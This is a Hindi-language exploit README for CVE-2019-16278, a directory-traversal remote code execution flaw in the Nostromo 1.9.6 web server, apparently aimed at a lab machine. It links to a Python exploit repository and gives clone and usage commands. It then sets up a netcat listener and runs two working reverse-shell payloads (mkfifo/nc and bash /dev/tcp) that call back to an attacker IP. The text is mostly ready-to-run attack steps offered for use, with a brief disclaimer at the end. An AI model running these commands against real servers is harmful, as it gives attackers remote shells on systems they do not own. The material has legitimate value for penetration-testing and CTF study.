
एक अनप्रमाणित हमलावर सर्वर बिंदुओं को '/bin/sh' जैसी शेल फ़ाइल पर मजबूर कर सकता है और URL को सत्यापित करने में विफलता के कारण मनमाना कमांड निष्पादित कर सकता है, जो सिस्टम में मौजूद किसी भी फ़ाइल के लिए पथ ट्रैवर्सल की ओर ले जाता है। Nostromo के संस्करण जैसे 1.9.6 इस URL को सत्यापित करने में विफल रहते हैं
POC
रिपॉजिटरी: https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git
इस रिपॉजिटरी में CVE-2019-16278 के लिए एक Python एक्सप्लॉइट है, जो Nostromo 1.9.6 (एक वेब सर्वर) में एक कमजोरी है। यह कमजोरी डायरेक्टरी ट्रैवर्सल का फायदा उठाकर लक्ष्य प्रणाली पर मनमाने कमांड निष्पादित करने के लिए रिमोट कोड एक्सीक्यूशन (RCE) की अनुमति देती है।
git clone https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git
cd CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution
python3 CVE-2019-16278.py -t <TARGET_IP> -p <PORT> -c "<COMMAND>" [-b <BYTES_TO_READ>]
| आर्गुमेंट | विवरण | आवश्यक | डिफ़ॉल्ट |
|---|---|---|---|
-t, --target | लक्ष्य IP पता | हाँ | कोई नहीं |
-p, --port | लक्ष्य पोर्ट | हाँ | कोई नहीं |
-c, --command | सर्वर पर निष्पादित करने का कमांड | हाँ | कोई नहीं |
-b, --bytes | प्रतिक्रिया में पढ़ने के लिए बाइट्स की संख्या | नहीं | 4096 |
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "whoami"
चरण 1: अपनी हमलावर मशीन पर Netcat लिसनर शुरू करें:
nc -lvnp 443
चरण 2: रिवर्स शेल पेलोड के साथ एक्सप्लॉइट निष्पादित करें:
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.16.5 443 > /tmp/f"
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "bash -i >& /dev/tcp/10.10.16.5/443 0>&1"
यह उपकरण केवल शैक्षिक उद्देश्यों के लिए है। इसे उन सिस्टम पर उपयोग न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है। सिस्टम तक अनधिकृत पहुँच अवैध है। जिम्मेदारी से उपयोग करें।